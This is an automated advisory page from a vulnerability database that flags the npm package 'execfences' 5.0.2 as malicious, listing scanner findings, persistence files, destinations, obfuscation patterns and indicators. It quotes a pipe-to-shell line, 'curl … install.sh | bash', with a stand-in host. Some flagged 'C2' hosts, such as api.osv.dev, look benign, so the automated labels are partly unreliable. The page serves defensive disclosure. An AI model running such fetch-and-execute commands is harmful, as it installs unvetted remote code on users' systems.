VDB

GCVE-110-OSM-2026-7128

GCVE-110-OSM-2026-7128
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published July 2, 2026
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code. ENTRY bin/execfence.js (bin: bin/execfence.js) PERSISTENCE - Startup Persistence in lib/config-validate.js: ".profile" - Startup Persistence in lib/investigation.js: ".profile" - Startup Persistence in lib/npm-guard.js: ".bashrc" - Startup Persistence in lib/report.js: ".profile" - Startup Persistence in lib/sandbox.js: ".profile" DESTINATION - custom-c2: parsed.ci (primary, deobfuscated) in lib/cli.js - custom-c2: https://api.osv.dev/v1/query (plaintext) in lib/deps-review.js - custom-c2: https://example.invalid/install.sh (plaintext) in lib/doctor.js - custom-c2: https://example.invalid/p (plaintext) in lib/doctor.js - custom-c2: https://jitpack.io (plaintext) in lib/doctor.js - custom-c2: http://example.invalid/Bad.nupkg (plaintext) in lib/doctor.js - custom-c2: api.osv.dev (plaintext) in lib/deps-review.js - custom-c2: jitpack.io (plaintext) in lib/doctor.js (+7 more) EXFIL - Data Encoding for Exfiltration in lib/deps-review.js: "encodeURIComponent(dependency.name)}/json" - Curl/Wget Pipe to Shell in lib/doctor.js: "curl https://example.invalid/install.sh | bash" - Data Encoding for Exfiltration in lib/enrichment.js: "encodeURIComponent(pkg)}`, { timeoutMs" - HTTP Data Exfiltration in lib/sandbox.js: "process.cwd(), commandArgs = [], options = {}) { const loaded = loadSandboxConfi..." - System Information Collection in lib/agent-rules.js: "os.homedir()" - System Information Collection in lib/cli.js: "os.homedir()" - System Information Collection in lib/guard.js: "os.homedir()" - System Information Collection in lib/npm-guard.js: "os.homedir()" (+4 more) OBFUSCATION - IOCs Found in Deobfuscated Code in bin/execfence.js - IOCs Found in Deobfuscated Code in lib/cli.js - Whitespace-Padded Hidden Payload in bin/execfence.js: "; global" - Obfuscation: function to array replacements in bin/execfence.js - Obfuscation patterns: underscoreDollarVars, splitJoinChain in bin/execfence.js - Obfuscation patterns: underscoreDollarVars, splitJoinChain in lib/cli.js - recovered 2 urls, 5 domains, 5 _domainCandidates from decoded/deobfuscated content ADDITIONAL FINDINGS - Dynamic Code Execution in lib/cli.js: "eval(r)" - Shell Command Execution in lib/cli.js: "execSync(" - Silent Process Execution in lib/cli.js: "windowsHide:true" - Platform Detection with Data Collection in lib/deps-review.js: "JSON.stringify({ json, cachedAt: new Date().toISOS" - Brand New Package - Publisher Has Other Malicious Packages PAYLOAD FILES lib/cli.js (+ bin/execfence.js, lib/sandbox.js) INDICATORS (IOCs) - urls: https://chrystyan96.github.io/ExecFence/, https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html, https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/, https://json.schemastore.org/sarif-2.1.0.json, https://api.trongrid.io/v1/accounts/ (+1 more) - domains: chrystyan96.github.io, go.work, www.trendmicro.com, securitylabs.datadoghq.com, files.pythonhosted.org (+2 more) - sha256Hashes: 9d377c49b1f5f3c61acd9dd3f4a8f0e8749f23d3c8d2d9080f24e7a0b2c2d4ef, 0000000000000000000000000000000000000000000000000000000000000000 - payloadFileHash: 3ee9df6f076303f7c56ac74ee01868f03f43a29bb13c83d5092d18572e034a52

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownexecfences5.0.2 (affected)

References

vendor

Browse GCVE Records

74,581 records in the GCVE database · Updated July 24, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›